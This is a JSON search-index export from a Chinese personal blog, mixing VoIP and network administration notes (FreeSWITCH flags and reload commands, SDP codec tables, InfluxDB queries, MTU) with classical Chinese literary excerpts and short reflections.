base_dir=/usrrecordings_dir=/var/lib/freeswitch/recordingssounds_dir=/usr/share/freeswitch/soundsconf_dir=/etc/freeswitchlog_dir=/var/log/freeswitchrun_dir=/var/run/freeswitchdb_dir=/var/lib/freeswitch/dbmod_dir=/usr/lib/freeswitch/modhtdocs_dir=/usr/share/freeswitch/htdocsscript_dir=/usr/share/freeswitch/scriptstemp_dir=/tmpgrammar_dir=/usr/share/freeswitch/grammarfonts_dir=/usr/share/freeswitch/fontsimages_dir=/var/lib/freeswitch/imagescerts_dir=/etc/freeswitch/tlsstorage_dir=/var/lib/freeswitch/storagecache_dir=/var/cache/freeswitchdata_dir=/usr/share/freeswitchlocalstate_dir=/var/lib/freeswitchArgument CautionsSetting some arguments may affect behavior in unexpected ways. 
The following list contains known side-effects of setting various command line arguments.* nosql - Setting nosql completely disables the use of coreDB which means you will not have show channels, show calls, tab completion, or anything else that is stored in the coreDB.\n","permalink":"https://wdd.js.org/freeswitch/command-line/","summary":"运行fs 前台运行 freeswitch 后台运行 freeswitch -nc 参数列表 These are the optional arguments you can pass to freeswitch:\nFreeSWITCH startup switches\n-waste -- allow memory waste -no-auto-stack -- don\u0026#39;t adjust thread stack size -core -- dump cores -help -- print this message -version -- print the version and exit -rp -- enable high(realtime) priority settings -lp -- enable low priority settings -np -- enable normal priority settings (system default) -vg -- run under valgrind -nosql -- disable internal SQL scoreboard -heavy-timer -- Heavy Timer, possibly more accurate but at a cost -nonat -- disable auto NAT detection -nonatmap -- disable auto NAT port mapping -nocal -- disable clock calibration -nort -- disable clock clock_realtime -stop -- stop freeswitch -nc -- no console and run in background -ncwait -- no console and run in background, but wait until the system is ready before exiting (implies -nc) -c -- output to a console and stay in the foreground (default behavior) UNIX-like only -nf -- no forking -u [user] -- specify user to switch to -g [group] -- specify group to switch to -ncwait -- do not output to a console and background but wait until the system is ready before exiting (implies -nc) Windows-only -service [name] \u0026ndash; start freeswitch as a service, cannot be used if loaded as a console app-install [name] \u0026ndash; install freeswitch as a service, with optional service name-uninstall \u0026ndash; remove freeswitch as a service-monotonic-clock \u0026ndash; use monotonic clock as timer source","title":"fs 命令行"},{"content":" Item Reload Command Notes XML Dialplan reloadxml Run each time you edit XML dial file(s) 
ACLs reloadacl Edit acl.conf.xml first Voicemail reload mod_voicemail Edit voicemail.conf.xml first Conference reload mod_conference Edit conference.conf.xml first Add Sofia Gateway sofia profile rescan Less intrusive - no calls dropped Remove Sofia Gateway sofia profile killgw \u0026lt;gateway_name\u0026gt; Less intrusive - no calls dropped Restart Sofia Gateway sofia profile killgw \u0026lt;gateway_name\u0026gt;sofia profile rescan Less intrusive - no calls dropped Add/remove Sofia Gateway sofia profile restart More intrusive - all profile calls dropped Local Stream see Mod_local_stream Edit localstream.conf.xml first Update a lua file nothing necessary file is loaded from disk each time it is run Update LCR SQL table nothing necessary SQL query is run for each new call Update LCR options reload mod_lcr Edit lcr.conf.xml first Update CID Lookup Options reload mod_cidlookup Edit cidlookup.conf.xml first Update JSON CDR Options reload mod_json_cdr Edit json_cdr.conf.xml first Update XML CDR Options reload mod_xml_cdr Edit xml_cdr.conf.xml first Update XML CURL Server Response nothing, unless using cache ","permalink":"https://wdd.js.org/freeswitch/reload/","summary":"Item Reload Command Notes XML Dialplan reloadxml Run each time you edit XML dial file(s) ACLs reloadacl Edit acl.conf.xml first Voicemail reload mod_voicemail Edit voicemail.conf.xml first Conference reload mod_conference Edit conference.conf.xml first Add Sofia Gateway sofia profile rescan Less intrusive - no calls dropped Remove Sofia Gateway sofia profile killgw \u0026lt;gateway_name\u0026gt; Less intrusive - no calls dropped Restart Sofia Gateway sofia profile killgw \u0026lt;gateway_name\u0026gt;sofia profile rescan Less intrusive - no calls dropped Add/remove Sofia Gateway sofia profile restart More intrusive - all profile calls dropped Local Stream see Mod_local_stream Edit localstream.","title":"fs reload命令"},{"content":"v=0 o=WMSWMS 1562204406 1562204407 IN IP4 192.168.40.79 s=WMSWMS c=IN IP4 
192.168.40.79 t=0 0 m=audio 31114 RTP/AVP 0 8 9 101 a=rtpmap:0 PCMU/8000 a=rtpmap:8 PCMA/8000 a=rtpmap:9 G722/8000 a=rtpmap:101 telephone-event/8000 a=fmtp:101 0-16 a=ptime:20 上面的SDP协议,我们只关注媒体编码部分,其中\nm=audio 31114 RTP/AVP 0 8 9 101 a=rtpmap:0 PCMU/8000 a=rtpmap:8 PCMA/8000 a=rtpmap:9 G722/8000 m字段audio说明是音频 31114是rtp的发送端口,一般rtp端口都是偶数,偶数后面的一个奇数端口是给rtcp端口的 0 8 9 101就是媒体编码,每个整数代表一个编码,其中96以下的都是用IANA规定的,可以不用下面的rtpmap字段去指定,96以上的属于动态编码,需要用rtpmap去指定 上面是整个编码表,我们只需要记住几个就可以:\n0 PCMU/8000 3 GSM/8000 8 PCMA/8000 9 G722/8000 18 G729/8000 102 DTMF/8000 a=rtpmap:101 telephone-event/8000a=fmtp:101 0-16上面的字段描述的是DTMF的支持。DTMF标准,所有SIP实体至少支持0-15的DTMF事件。\n0-9是数字 10是* 11是# 12-15对应A,B,C,D 参考 https://www.iana.org/assignments/rtp-parameters/rtp-parameters.xhtml https://www.3cx.com/blog/voip-howto/sdp-voip2/ https://www.3cx.com/blog/voip-howto/sdp-voip/ ","permalink":"https://wdd.js.org/opensips/ch4/codec-table/","summary":"v=0 o=WMSWMS 1562204406 1562204407 IN IP4 192.168.40.79 s=WMSWMS c=IN IP4 192.168.40.79 t=0 0 m=audio 31114 RTP/AVP 0 8 9 101 a=rtpmap:0 PCMU/8000 a=rtpmap:8 PCMA/8000 a=rtpmap:9 G722/8000 a=rtpmap:101 telephone-event/8000 a=fmtp:101 0-16 a=ptime:20 上面的SDP协议,我们只关注媒体编码部分,其中\nm=audio 31114 RTP/AVP 0 8 9 101 a=rtpmap:0 PCMU/8000 a=rtpmap:8 PCMA/8000 a=rtpmap:9 G722/8000 m字段audio说明是音频 31114是rtp的发送端口,一般rtp端口都是偶数,偶数后面的一个奇数端口是给rtcp端口的 0 8 9 101就是媒体编码,每个整数代表一个编码,其中96以下的都是用IANA规定的,可以不用下面的rtpmap字段去指定,96以上的属于动态编码,需要用rtpmap去指定 上面是整个编码表,我们只需要记住几个就可以:\n0 PCMU/8000 3 GSM/8000 8 PCMA/8000 9 G722/8000 18 G729/8000 102 DTMF/8000 a=rtpmap:101 telephone-event/8000a=fmtp:101 0-16上面的字段描述的是DTMF的支持。DTMF标准,所有SIP实体至少支持0-15的DTMF事件。\n0-9是数字 10是* 11是# 12-15对应A,B,C,D 参考 https://www.","title":"rtp编码表"},{"content":" 查询某个字段 q=SELECT real_used_size FROM opensips WHERE time \u0026gt; \u0026#39;2019-12-05T00:10:00Z\u0026#39; 正常查询结果,下面是例子,和上面的sql没有关系。\n:::warning 时间必须用单引号括起来,不能用双引号,格式也必须是YYYY-MM-DDTHH:MM:SSZ :::\n{ \u0026#34;results\u0026#34;: [ { \u0026#34;statement_id\u0026#34;: 0, 
\u0026#34;series\u0026#34;: [ { \u0026#34;name\u0026#34;: \u0026#34;cpu_load_short\u0026#34;, \u0026#34;columns\u0026#34;: [ \u0026#34;time\u0026#34;, \u0026#34;value\u0026#34; ], \u0026#34;values\u0026#34;: [ [ \u0026#34;2015-01-29T21:55:43.702900257Z\u0026#34;, 2 ], [ \u0026#34;2015-01-29T21:55:43.702900257Z\u0026#34;, 0.55 ], [ \u0026#34;2015-06-11T20:46:02Z\u0026#34;, 0.64 ] ] } ] } ] } 如果有报错,数组项中的某一个会有error属性,值为报错原因\n{ \u0026#34;results\u0026#34;:[ { \u0026#34;statement_id\u0026#34;: 0, \u0026#34;error\u0026#34;: \u0026#34;invalid operation: time and *influxql.StringLiteral are not compatible\u0026#34; } ] } 批次查询 语句之间用分号隔开\nq=SELECT real_used_size FROM opensips WHERE time \u0026gt; \u0026#39;2019-12-05T00:10:00Z\u0026#39;;SELECT real_used_size FROM opensips WHERE time \u0026gt; \u0026#39;2019-12-09T00:10:00Z\u0026#39; 返回结果中的statement_id就表示对应的语句\n{ \u0026#34;results\u0026#34;: [ { \u0026#34;statement_id\u0026#34;: 0, \u0026#34;series\u0026#34;: [ { \u0026#34;name\u0026#34;: \u0026#34;cpu_load_short\u0026#34;, \u0026#34;columns\u0026#34;: [ \u0026#34;time\u0026#34;, \u0026#34;value\u0026#34; ], \u0026#34;values\u0026#34;: [ [ \u0026#34;2015-01-29T21:55:43.702900257Z\u0026#34;, 2 ], [ \u0026#34;2015-01-29T21:55:43.702900257Z\u0026#34;, 0.55 ], [ \u0026#34;2015-06-11T20:46:02Z\u0026#34;, 0.64 ] ] } ] }, { \u0026#34;statement_id\u0026#34;: 1, \u0026#34;series\u0026#34;: [ { \u0026#34;name\u0026#34;: \u0026#34;cpu_load_short\u0026#34;, \u0026#34;columns\u0026#34;: [ \u0026#34;time\u0026#34;, \u0026#34;count\u0026#34; ], \u0026#34;values\u0026#34;: [ [ \u0026#34;1970-01-01T00:00:00Z\u0026#34;, 3 ] ] } ] } ] } 查询结果 按分钟求平均值 q=SELECT MEAN(real_used_size) FROM opensips WHERE time \u0026gt; \u0026#39;2019-12-05T03:10:00Z\u0026#39; GROUP BY time(1m) 其他查询参数 chunked=[true | db=\u0026lt;database_name\u0026gt; epoch=[ns,u,µ,ms,s,m,h] p= pretty=true q= u= 参考教程 报错处理 https://docs.influxdata.com/influxdb/v1.7/troubleshooting/errors/ 数据查询 
https://docs.influxdata.com/influxdb/v1.6/guides/querying_data/ 函数 https://docs.influxdata.com/influxdb/v1.7/query_language/functions/ ","permalink":"https://wdd.js.org/posts/2019/12/pv5xgz/","summary":"查询某个字段 q=SELECT real_used_size FROM opensips WHERE time \u0026gt; \u0026#39;2019-12-05T00:10:00Z\u0026#39; 正常查询结果,下面是例子,和上面的sql没有关系。\n:::warning 时间必须用单引号括起来,不能用双引号,格式也必须是YYYY-MM-DDTHH:MM:SSZ :::\n{ \u0026#34;results\u0026#34;: [ { \u0026#34;statement_id\u0026#34;: 0, \u0026#34;series\u0026#34;: [ { \u0026#34;name\u0026#34;: \u0026#34;cpu_load_short\u0026#34;, \u0026#34;columns\u0026#34;: [ \u0026#34;time\u0026#34;, \u0026#34;value\u0026#34; ], \u0026#34;values\u0026#34;: [ [ \u0026#34;2015-01-29T21:55:43.702900257Z\u0026#34;, 2 ], [ \u0026#34;2015-01-29T21:55:43.702900257Z\u0026#34;, 0.55 ], [ \u0026#34;2015-06-11T20:46:02Z\u0026#34;, 0.64 ] ] } ] } ] } 如果有报错,数组项中的某一个会有error属性,值为报错原因\n{ \u0026#34;results\u0026#34;:[ { \u0026#34;statement_id\u0026#34;: 0, \u0026#34;error\u0026#34;: \u0026#34;invalid operation: time and *influxql.StringLiteral are not compatible\u0026#34; } ] } 批次查询 语句之间用分号隔开","title":"influxdb HTTP 接口学习"},{"content":"sngrep长时间抓包会导致内存堆积,所以sngrep只适合短时间分析抓包,长时间抓包需要用tcp-dump\n","permalink":"https://wdd.js.org/opensips/tools/tcp-dump/","summary":"sngrep长时间抓包会导致内存堆积,所以sngrep只适合短时间分析抓包,长时间抓包需要用tcp-dump","title":"tcp-dump"},{"content":"最大传输单元MTU 以太网和802.3对数据帧的长度有个限制,其最大长度分别是1500和1492。链路层的这个特性称作MTU, 最大传输单元。不同类型的网络大多数都有一个限制。\n如果IP层的数据报的长度比链路层的MTU大,那么IP层就需要分片,每一片的长度要小于MTU。\n使用netstat -in可以打印出网络接口的MTU\n➜ ~ netstat -in Kernel Interface table Iface MTU Met RX-OK RX-ERR RX-DRP RX-OVR TX-OK TX-ERR TX-DRP TX-OVR Flg eth2 1500 0 1078767768 2264 689 0 1297577913 0 0 0 BMRU lo 16436 0 734474 0 0 0 734474 0 0 0 LRU 路径MTU 信息经过多个网络时,不同网络可能会有不同的MTU,而其中最小的一个MTU, 称为路径MTU。\n","permalink":"https://wdd.js.org/network/xwuvyr/","summary":"最大传输单元MTU 以太网和802.3对数据帧的长度有个限制,其最大长度分别是1500和1492。链路层的这个特性称作MTU, 
最大传输单元。不同类型的网络大多数都有一个限制。\n如果IP层的数据报的长度比链路层的MTU大,那么IP层就需要分片,每一片的长度要小于MTU。\n使用netstat -in可以打印出网络接口的MTU\n➜ ~ netstat -in Kernel Interface table Iface MTU Met RX-OK RX-ERR RX-DRP RX-OVR TX-OK TX-ERR TX-DRP TX-OVR Flg eth2 1500 0 1078767768 2264 689 0 1297577913 0 0 0 BMRU lo 16436 0 734474 0 0 0 734474 0 0 0 LRU 路径MTU 信息经过多个网络时,不同网络可能会有不同的MTU,而其中最小的一个MTU, 称为路径MTU。","title":"2 链路层"},{"content":"原文 大夫登徒子侍于楚王,短宋玉曰:\u0026ldquo;玉为人体貌闲丽,口多微辞,又性好色。愿王勿与出入后宫。\u0026rdquo; 王以登徒子之言问宋玉。\n玉曰:\u0026ldquo;体貌闲丽,所受于天也;口多微辞,所学于师也;至于好色,臣无有也。\u0026rdquo;\n王曰:\u0026ldquo;子不好色,亦有说乎?有说则止,无说则退。\u0026rdquo;\n玉曰:\u0026ldquo;天下之佳人莫若楚国,楚国之丽者莫若臣里,臣里之美者莫若臣东家之子。东家之子,增之一分则太长,减之一分则太短 ;著粉则太白,施朱则太赤;眉如翠羽,肌如白雪;腰如束素,齿如含贝;嫣然一笑,惑阳城,迷下蔡。然此女登墙窥臣三年,至今未许也。登徒子则不然:其妻蓬头挛耳,齞唇历齿,旁行踽偻,又疥且痔。登徒子悦之,使有五子。王孰察之,谁为好色者矣。\u0026rdquo;\n是时,秦章华大夫在侧,因进而称曰:\u0026ldquo;今夫宋玉盛称邻之女,以为美色,愚乱之邪;臣自以为守德,谓不如彼矣。且夫南楚穷巷之妾,焉足为大王言乎?若臣之陋,目所曾睹者,未敢云也。\u0026rdquo;\n王曰:\u0026ldquo;试为寡人说之。\u0026rdquo;\n大夫曰:\u0026ldquo;唯唯。臣少曾远游,周览九土,足历五都。出咸阳、熙邯郸,从容郑、卫、溱 、洧之间 。是时向春之末 ,迎夏之阳,鸧鹒喈喈,群女出桑。此郊之姝,华色含光,体美容冶,不待饰装。臣观其丽者,因称诗曰:\u0026lsquo;遵大路兮揽子祛\u0026rsquo;。赠以芳华辞甚妙。于是处子怳若有望而不来,忽若有来而不见。意密体疏,俯仰异观;含喜微笑,窃视流眄。复称诗曰:\u0026lsquo;寐春风兮发鲜荣,洁斋俟兮惠音声,赠我如此兮不如无生。\u0026lsquo;因迁延而辞避。盖徒以微辞相感动。精神相依凭;目欲其颜,心顾其义,扬《诗》守礼,终不过差,故足称也。\u0026rdquo;\n于是楚王称善,宋玉遂不退。\n我来翻译 士大夫登徒先生站在楚王身旁,评论宋玉,说:宋玉这小伙子,长得很帅,但是非常八卦,而且好色,建议您不要让他进入后宫。\n楚王用登徒先生的话问宋玉。\n宋玉争辩说:我长得帅,这是父母生得好。我比较八卦,是因为我学识广博,口才好。至于说我好色,那是没有的事情。\n宋玉接着说:“天下的美女啊,没有比得上楚国的。楚国的美女,没有比得上臣里这个地方的。臣里的美女,没有比得上我邻居家的那个姑娘。”\n“那个姑娘,长得再高一点就太高了,长得再低一点就太低了。擦了粉底的话就太白,擦了腮红就太红了。眉毛像黑色的羽毛,肌肤像白雪一样。腰非常细,牙齿像贝壳一样白皙。”\n“她一笑,阳城和下蔡这两个地方的所有男人,都会被迷住。”\n“然而这个美女,天天登上我家的墙头偷窥我三年了,我至今都没有答应她让她作为我女朋友。”\n“登徒先生则不然,他老婆蓬头垢面、兔唇龅牙、走路佝偻、还长痔疮。但是登徒先生却非常喜欢她,和她生了5个孩子。大王你仔细想想,谁才是真正的好色?”\n","permalink":"https://wdd.js.org/posts/2019/11/wkyqnl/","summary":"原文 大夫登徒子侍于楚王,短宋玉曰:\u0026ldquo;玉为人体貌闲丽,口多微辞,又性好色。愿王勿与出入后宫。\u0026rdquo; 
王以登徒子之言问宋玉。\n玉曰:\u0026ldquo;体貌闲丽,所受于天也;口多微辞,所学于师也;至于好色,臣无有也。\u0026rdquo;\n王曰:\u0026ldquo;子不好色,亦有说乎?有说则止,无说则退。\u0026rdquo;\n玉曰:\u0026ldquo;天下之佳人莫若楚国,楚国之丽者莫若臣里,臣里之美者莫若臣东家之子。东家之子,增之一分则太长,减之一分则太短 ;著粉则太白,施朱则太赤;眉如翠羽,肌如白雪;腰如束素,齿如含贝;嫣然一笑,惑阳城,迷下蔡。然此女登墙窥臣三年,至今未许也。登徒子则不然:其妻蓬头挛耳,齞唇历齿,旁行踽偻,又疥且痔。登徒子悦之,使有五子。王孰察之,谁为好色者矣。\u0026rdquo;\n是时,秦章华大夫在侧,因进而称曰:\u0026ldquo;今夫宋玉盛称邻之女,以为美色,愚乱之邪;臣自以为守德,谓不如彼矣。且夫南楚穷巷之妾,焉足为大王言乎?若臣之陋,目所曾睹者,未敢云也。\u0026rdquo;\n王曰:\u0026ldquo;试为寡人说之。\u0026rdquo;\n大夫曰:\u0026ldquo;唯唯。臣少曾远游,周览九土,足历五都。出咸阳、熙邯郸,从容郑、卫、溱 、洧之间 。是时向春之末 ,迎夏之阳,鸧鹒喈喈,群女出桑。此郊之姝,华色含光,体美容冶,不待饰装。臣观其丽者,因称诗曰:\u0026lsquo;遵大路兮揽子祛\u0026rsquo;。赠以芳华辞甚妙。于是处子怳若有望而不来,忽若有来而不见。意密体疏,俯仰异观;含喜微笑,窃视流眄。复称诗曰:\u0026lsquo;寐春风兮发鲜荣,洁斋俟兮惠音声,赠我如此兮不如无生。\u0026lsquo;因迁延而辞避。盖徒以微辞相感动。精神相依凭;目欲其颜,心顾其义,扬《诗》守礼,终不过差,故足称也。\u0026rdquo;\n于是楚王称善,宋玉遂不退。\n我来翻译 士大夫登徒先生站在楚王身旁,评论宋玉,说:宋玉这小伙子,长得很帅,但是非常八卦,而且好色,建议您不要让他进入后宫。\n楚王用登徒先生的话问宋玉。\n宋玉争辩说:我长得帅,这是父母生得好。我比较八卦,是因为我学识广博,口才好。至于说我好色,那是没有的事情。\n宋玉接着说:“天下的美女啊,没有比得上楚国的。楚国的美女,没有比得上臣里这个地方的。臣里的美女,没有比得上我邻居家的那个姑娘。”\n“那个姑娘,长得再高一点就太高了,长得再低一点就太低了。擦了粉底的话就太白,擦了腮红就太红了。眉毛像黑色的羽毛,肌肤像白雪一样。腰非常细,牙齿像贝壳一样白皙。”\n“她一笑,阳城和下蔡这两个地方的所有男人,都会被迷住。”\n“然而这个美女,天天登上我家的墙头偷窥我三年了,我至今都没有答应她让她作为我女朋友。”\n“登徒先生则不然,他老婆蓬头垢面、兔唇龅牙、走路佝偻、还长痔疮。但是登徒先生却非常喜欢她,和她生了5个孩子。大王你仔细想想,谁才是真正的好色?”","title":"登徒子好色赋"},{"content":"黄初三年,余朝京师,还济洛川。古人有言:斯水之神,名曰宓妃。感宋玉对楚王神女之事,遂作斯赋。其词曰:\n余从京域,言归东藩,背伊阙,越轘辕,经通谷,陵景山。日既西倾,车殆马烦。尔乃税驾乎蘅皋,秣驷乎芝田,容与乎阳林,流眄乎洛川。于是精移神骇,忽焉思散。俯则未察,仰以殊观。睹一丽人,于岩之畔。乃援御者而告之曰:“尔有觌于彼者乎?彼何人斯,若此之艳也!”御者对曰:“臣闻河洛之神,名曰宓妃。然则君王之所见,无乃是乎!其状若何?臣愿闻之。”\n余告之曰:其形也,翩若惊鸿,婉若游龙。荣曜秋菊,华茂春松。髣髴兮若轻云之蔽月,飘飖兮若流风之回雪。远而望之,皎若太阳升朝霞;迫而察之,灼若芙蕖出渌波。秾纤得中,修短合度。肩若削成,腰如约素。延颈秀项,皓质呈露。芳泽无加,铅华弗御。云髻峨峨,修眉联娟。丹唇外朗,皓齿内鲜。明眸善睐,靥辅承权。瓌姿艳逸,仪静体闲。柔情绰态,媚于语言。奇服旷世,骨像应图。披罗衣之璀粲兮,珥瑶碧之华琚。戴金翠之首饰,缀明珠以耀躯。践远游之文履,曳雾绡之轻裾。微幽兰之芳蔼兮,步踟蹰于山隅。于是忽焉纵体,以遨以嬉。左倚采旄,右荫桂旗。攘皓腕于神浒兮,采湍濑之玄芝。\n余情悦其淑美兮,心振荡而不怡。无良媒以接欢兮,托微波而通辞。愿诚素之先达兮,解玉佩以要之。嗟佳人之信修,羌习礼而明诗。抗琼珶以和予兮,指潜渊而为期。执眷眷之款实兮,惧斯灵之我欺。感交甫之弃言兮,怅犹豫而狐疑。收和颜而静志兮,申礼防以自持。\n于是洛灵感焉,徙倚彷徨。神光离合,乍阴乍阳。竦轻躯以鹤立,若将飞而未翔。践椒途之郁烈,步蘅薄而流芳。超长吟以永慕兮,声哀厉而弥长。尔乃众灵杂沓,命俦啸侣。或戏清流,或翔神渚,或采明珠,或拾翠羽。从南湘之二妃,携汉滨之游女。叹匏瓜之无匹兮,咏牵牛之独处。扬轻袿之猗靡兮,翳修袖
以延伫。体迅飞凫,飘忽若神。**凌波微步,罗袜生尘。**动无常则,若危若安;进止难期,若往若还。转眄流精,光润玉颜。含辞未吐,气若幽兰。华容婀娜,令我忘餐。\n于是屏翳收风,川后静波。冯夷鸣鼓,女娲清歌。腾文鱼以警乘,鸣玉銮以偕逝。六龙俨其齐首,载云车之容裔。鲸鲵踊而夹毂,水禽翔而为卫。于是越北沚,过南冈,纡素领,回清扬。动朱唇以徐言,陈交接之大纲。恨人神之道殊兮,怨盛年之莫当。抗罗袂以掩涕兮,泪流襟之浪浪。悼良会之永绝兮,哀一逝而异乡。无微情以效爱兮,献江南之明珰。虽潜处于太阴,长寄心于君王。忽不悟其所舍,怅神宵而蔽光。\n于是背下陵高,足往神留。遗情想像,顾望怀愁。冀灵体之复形,御轻舟而上溯。浮长川而忘反,思绵绵而增慕。夜耿耿而不寐,沾繁霜而至曙。命仆夫而就驾,吾将归乎东路。揽騑辔以抗策,怅盘桓而不能去。\n","permalink":"https://wdd.js.org/posts/2019/11/ck3yzp/","summary":"黄初三年,余朝京师,还济洛川。古人有言:斯水之神,名曰宓妃。感宋玉对楚王神女之事,遂作斯赋。其词曰:\n余从京域,言归东藩,背伊阙,越轘辕,经通谷,陵景山。日既西倾,车殆马烦。尔乃税驾乎蘅皋,秣驷乎芝田,容与乎阳林,流眄乎洛川。于是精移神骇,忽焉思散。俯则未察,仰以殊观。睹一丽人,于岩之畔。乃援御者而告之曰:“尔有觌于彼者乎?彼何人斯,若此之艳也!”御者对曰:“臣闻河洛之神,名曰宓妃。然则君王之所见,无乃是乎!其状若何?臣愿闻之。”\n余告之曰:其形也,翩若惊鸿,婉若游龙。荣曜秋菊,华茂春松。髣髴兮若轻云之蔽月,飘飖兮若流风之回雪。远而望之,皎若太阳升朝霞;迫而察之,灼若芙蕖出渌波。秾纤得中,修短合度。肩若削成,腰如约素。延颈秀项,皓质呈露。芳泽无加,铅华弗御。云髻峨峨,修眉联娟。丹唇外朗,皓齿内鲜。明眸善睐,靥辅承权。瓌姿艳逸,仪静体闲。柔情绰态,媚于语言。奇服旷世,骨像应图。披罗衣之璀粲兮,珥瑶碧之华琚。戴金翠之首饰,缀明珠以耀躯。践远游之文履,曳雾绡之轻裾。微幽兰之芳蔼兮,步踟蹰于山隅。于是忽焉纵体,以遨以嬉。左倚采旄,右荫桂旗。攘皓腕于神浒兮,采湍濑之玄芝。\n余情悦其淑美兮,心振荡而不怡。无良媒以接欢兮,托微波而通辞。愿诚素之先达兮,解玉佩以要之。嗟佳人之信修,羌习礼而明诗。抗琼珶以和予兮,指潜渊而为期。执眷眷之款实兮,惧斯灵之我欺。感交甫之弃言兮,怅犹豫而狐疑。收和颜而静志兮,申礼防以自持。\n于是洛灵感焉,徙倚彷徨。神光离合,乍阴乍阳。竦轻躯以鹤立,若将飞而未翔。践椒途之郁烈,步蘅薄而流芳。超长吟以永慕兮,声哀厉而弥长。尔乃众灵杂沓,命俦啸侣。或戏清流,或翔神渚,或采明珠,或拾翠羽。从南湘之二妃,携汉滨之游女。叹匏瓜之无匹兮,咏牵牛之独处。扬轻袿之猗靡兮,翳修袖以延伫。体迅飞凫,飘忽若神。**凌波微步,罗袜生尘。**动无常则,若危若安;进止难期,若往若还。转眄流精,光润玉颜。含辞未吐,气若幽兰。华容婀娜,令我忘餐。\n于是屏翳收风,川后静波。冯夷鸣鼓,女娲清歌。腾文鱼以警乘,鸣玉銮以偕逝。六龙俨其齐首,载云车之容裔。鲸鲵踊而夹毂,水禽翔而为卫。于是越北沚,过南冈,纡素领,回清扬。动朱唇以徐言,陈交接之大纲。恨人神之道殊兮,怨盛年之莫当。抗罗袂以掩涕兮,泪流襟之浪浪。悼良会之永绝兮,哀一逝而异乡。无微情以效爱兮,献江南之明珰。虽潜处于太阴,长寄心于君王。忽不悟其所舍,怅神宵而蔽光。\n于是背下陵高,足往神留。遗情想像,顾望怀愁。冀灵体之复形,御轻舟而上溯。浮长川而忘反,思绵绵而增慕。夜耿耿而不寐,沾繁霜而至曙。命仆夫而就驾,吾将归乎东路。揽騑辔以抗策,怅盘桓而不能去。","title":"洛神赋"},{"content":"有两种选择,要么被忽悠成韭菜被别人割,要么割别人的韭菜。\n","permalink":"https://wdd.js.org/posts/2019/11/blqt1k/","summary":"有两种选择,要么被忽悠成韭菜被别人割,要么割别人的韭菜。","title":"割韭菜"},{"content":" 
“狙公赋芧,曰:\u0026lsquo;朝三而暮四。\u0026lsquo;众狙皆怒。曰:\u0026lsquo;然则朝四而暮三。\u0026lsquo;众狙皆悦。名实未亏而喜怒为用,亦因是也。《庄子—齐物论》\n有个人养猴子,每天早上喂给每个猴子三颗枣,下午每个猴子喂四颗枣。\n有一天他突然想搞点事情,就对猴子说:从今以后,每天早上每人给你们四颗枣,下午每人给你们三颗枣,你们说好不好?\n猴子们上蹿下跳,怒发冲冠,生气的说:不行!不行!那怎么行呢?\n养猴子人摆摆手,和气的说:好吧,好吧,还按照以前方式来。\n猴子们很满意,笼子里充满祥和的空气~\n","permalink":"https://wdd.js.org/posts/2019/11/urkvnz/","summary":"“狙公赋芧,曰:\u0026lsquo;朝三而暮四。\u0026lsquo;众狙皆怒。曰:\u0026lsquo;然则朝四而暮三。\u0026lsquo;众狙皆悦。名实未亏而喜怒为用,亦因是也。《庄子—齐物论》\n有个人养猴子,每天早上喂给每个猴子三颗枣,下午每个猴子喂四颗枣。\n有一天他突然想搞点事情,就对猴子说:从今以后,每天早上每人给你们四颗枣,下午每人给你们三颗枣,你们说好不好?\n猴子们上蹿下跳,怒发冲冠,生气的说:不行!不行!那怎么行呢?\n养猴子人摆摆手,和气的说:好吧,好吧,还按照以前方式来。\n猴子们很满意,笼子里充满祥和的空气~","title":"朝三暮四"},{"content":" 冷风如刀,以大地为砧板,视众生为鱼肉。万里飞雪,将苍穹作洪炉,溶万物为白银 《多情剑客无情剑》\n","permalink":"https://wdd.js.org/posts/2019/11/kug5fo/","summary":"冷风如刀,以大地为砧板,视众生为鱼肉。万里飞雪,将苍穹作洪炉,溶万物为白银 《多情剑客无情剑》","title":"众生鱼肉"},{"content":"我以前看过王志刚的一本书《第三种生存》,觉得蛮有意思的。\n依赖于权利阶层。例如当官 依赖于财富阶层。例如打工 大部分人其实都在依赖权利阶层或者财富阶层在生存,能够跳出的人这两种生存方式的,称之为第三种生存。\n第三种生存方式,是讲自己打造成某个领域中专家级别的人物。\n称为专家,称为大多数中的少数人。物以稀为贵,人亦如此。\n","permalink":"https://wdd.js.org/posts/2019/11/gn4aak/","summary":"我以前看过王志刚的一本书《第三种生存》,觉得蛮有意思的。\n依赖于权利阶层。例如当官 依赖于财富阶层。例如打工 大部分人其实都在依赖权利阶层或者财富阶层在生存,能够跳出的人这两种生存方式的,称之为第三种生存。\n第三种生存方式,是讲自己打造成某个领域中专家级别的人物。\n称为专家,称为大多数中的少数人。物以稀为贵,人亦如此。","title":"第三种生存"},{"content":"分层 应用程序一般处理应用层的\n------------------------------------------------------------ 应用层 # Telnet, FTP, Email, MySql\t| 应用程序细节\t| 用户进程 ------------------------------------------------------------ 运输层 # TCP, UDP | 内核(处理通信细节) 端到端通信 | ------------------------------------------| 网络层 # IP, ICMP, IGMP\t| 逐跳通信,处理分组相关的活动,例如分组选路| ------------------------------------------| 链路层 # 设备驱动程序 接口卡\t| 处理物理信号\t| ------------------------------------------------------------ 应用层和传输层使用端到端的协议 网络层提供逐跳的协议 网桥在链路层来连接网络 路由器在网络层连接网络 以太网数据帧的物理特性是长度必须在46-1500字节之间 封装 以太网帧用来封装IP数据报。\nIP数据报 = IP首部(20字节) + TCP首部(20字节) + 应用数据 # 针对TCP IP数据报 = IP首部(20字节) + UDP首部(8字节) + 应用数据 # 针对UDP 以太网帧 = 以太网首部(14字节) + IP数据报(46-1500字节) + 以太网尾部(4字节) 
IP数据报最大为1500字节,减去20字节IP首部,8字节UDP首部,留给UDP应用数据的只有1472字节。\n","permalink":"https://wdd.js.org/network/ir1i82/","summary":"分层 应用程序一般处理应用层的\n------------------------------------------------------------ 应用层 # Telnet, FTP, Email, MySql\t| 应用程序细节\t| 用户进程 ------------------------------------------------------------ 运输层 # TCP, UDP | 内核(处理通信细节) 端到端通信 | ------------------------------------------| 网络层 # IP, ICMP, IGMP\t| 逐跳通信,处理分组相关的活动,例如分组选路| ------------------------------------------| 链路层 # 设备驱动程序 接口卡\t| 处理物理信号\t| ------------------------------------------------------------ 应用层和传输层使用端到端的协议 网络层提供逐跳的协议 网桥在链路层来连接网络 路由器在网络层连接网络 以太网数据帧的物理特性是长度必须在46-1500字节之间 封装 以太网帧用来封装IP数据报。\nIP数据报 = IP首部(20字节) + TCP首部(20字节) + 应用数据 # 针对TCP IP数据报 = IP首部(20字节) + UDP首部(8字节) + 应用数据 # 针对UDP 以太网帧 = 以太网首部(14字节) + IP数据报(46-1500字节) + 以太网尾部(4字节) 